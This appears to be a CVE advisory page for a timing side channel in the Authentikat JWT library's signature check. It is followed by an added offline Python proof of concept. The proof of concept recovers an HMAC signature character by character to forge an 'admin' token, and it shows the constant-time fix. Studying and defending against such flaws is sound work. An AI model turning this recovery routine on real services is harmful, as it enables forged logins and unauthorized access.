Time-Sensitive Vulnerability in Authentikat JWT Library by Jason Goodwin
CVE-2017-18239
9.8 CRITICAL
What is CVE-2017-18239?
The JsonWebToken.validate method in the Authentikat JWT library checks the JWT signature with an ordinary string equality comparison. Such a comparison returns as soon as it reaches the first mismatching character, so the time it takes depends on how many leading characters of the attacker-supplied signature agree with the correct one. An attacker who can submit tokens and measure response times can therefore recover the correct signature one character at a time, trying every possible value at a position and keeping the one that makes validation take slightly longer. Because the server computes the expected signature over whatever header and payload the attacker submits, the recovered value is a valid signature for attacker-chosen claims: the attacker ends up with a forged, correctly signed token without ever learning the key, and can use it to gain unauthorized access or to present manipulated signed content. Over a network the per-character difference is tiny and has to be separated from jitter with many repeated measurements, but it does not go away. The fix is to compare signatures with a constant-time routine (for example java.security.MessageDigest.isEqual on the JVM) instead of string equality.
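The following is an added example, not code from authentikat-jwt, that models the flaw and the attack end to end in Python. The leaky comparison stands in for a string `==` that stops at the first mismatch; instead of measuring wall-clock time, it reports how many characters it compared, so the recovery is deterministic and runs offline. The key, the claims and the 43-character signature length (base64url of a 32-byte HMAC-SHA256 digest) are constructed for the demonstration; the attacker side never reads the key.

```python
"""Timing-leaky JWT signature check vs. constant-time check, plus a
character-by-character signature recovery driven by the leak.
Added example; not authentikat-jwt's code.  The leak is modelled by
counting compared bytes rather than timing, so the attack is deterministic."""
import base64
import hashlib
import hmac
import json
import string

# Every character a base64url signature can contain (the attacker's search space).
B64URL_ALPHABET = (string.ascii_uppercase + string.ascii_lowercase
                   + string.digits + "-_").encode("ascii")
SIG_LEN = 43  # len(b64url(32-byte HMAC-SHA256 digest)) without padding


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def sign_hs256(signing_input: str, key: bytes) -> str:
    return b64url(hmac.new(key, signing_input.encode("ascii"), hashlib.sha256).digest())


def encode_jwt(claims: dict, key: bytes) -> str:
    header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    payload = b64url(json.dumps(claims, separators=(",", ":")).encode())
    signing_input = f"{header}.{payload}"
    return f"{signing_input}.{sign_hs256(signing_input, key)}"


def leaky_equals(a: bytes, b: bytes):
    """Models String.equals / Scala ==: returns at the first differing byte.
    Returns (equal, bytes_compared); bytes_compared stands in for the time
    an attacker would measure."""
    if len(a) != len(b):
        return False, 0
    for i, (x, y) in enumerate(zip(a, b)):
        if x != y:
            return False, i + 1
    return True, len(a)


def validate_leaky(token: str, key: bytes):
    """Vulnerable validation: signature compared with leaky_equals."""
    header, payload, sig = token.split(".")
    expected = sign_hs256(f"{header}.{payload}", key)
    return leaky_equals(sig.encode("ascii"), expected.encode("ascii"))


def validate_constant_time(token: str, key: bytes) -> bool:
    """Hardened validation: compare_digest takes the same time wherever the
    first mismatch is (JVM equivalent: java.security.MessageDigest.isEqual)."""
    header, payload, sig = token.split(".")
    expected = sign_hs256(f"{header}.{payload}", key)
    return hmac.compare_digest(sig.encode("ascii"), expected.encode("ascii"))


def recover_signature(signing_input: str, oracle, sig_len: int = SIG_LEN) -> str:
    """Recover the server's HMAC for attacker-chosen signing_input one character
    at a time.  oracle(token) -> (accepted, time).  At position i the character
    that makes the comparison run past i is correct; the final character is
    confirmed by the token being accepted."""
    known = bytearray()
    for pos in range(sig_len):
        best_byte, best_time = None, -1
        for c in B64URL_ALPHABET:
            guess = bytes(known) + bytes([c]) + b"A" * (sig_len - pos - 1)
            accepted, t = oracle(f"{signing_input}.{guess.decode('ascii')}")
            if accepted:
                return guess.decode("ascii")
            if t > best_time:
                best_byte, best_time = c, t
        known.append(best_byte)
    return bytes(known).decode("ascii")


def forge_token(claims: dict, oracle) -> str:
    """Attacker's view: no key, only the server's validator as an oracle."""
    header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    payload = b64url(json.dumps(claims, separators=(",", ":")).encode())
    signing_input = f"{header}.{payload}"
    return f"{signing_input}.{recover_signature(signing_input, oracle)}"


if __name__ == "__main__":
    KEY = b"server-secret-known-only-to-the-server"  # constructed demo key
    # Against the leaky validator the forged token is accepted by everyone.
    forged = forge_token({"sub": "admin"}, lambda tok: validate_leaky(tok, KEY))
    print("forged token valid:", validate_constant_time(forged, KEY))
    # Against a constant-time validator the oracle gives no per-byte signal.
    guess = forge_token({"sub": "admin"}, lambda tok: (validate_constant_time(tok, KEY), SIG_LEN))
    print("blind guess valid:", validate_constant_time(guess, KEY))
```

The attack needs at most 64 oracle queries per signature character (2752 here) because each position is searched independently; the constant-time oracle yields the same "time" for every guess, so the recovery degenerates to a fixed wrong string and the forged token is rejected.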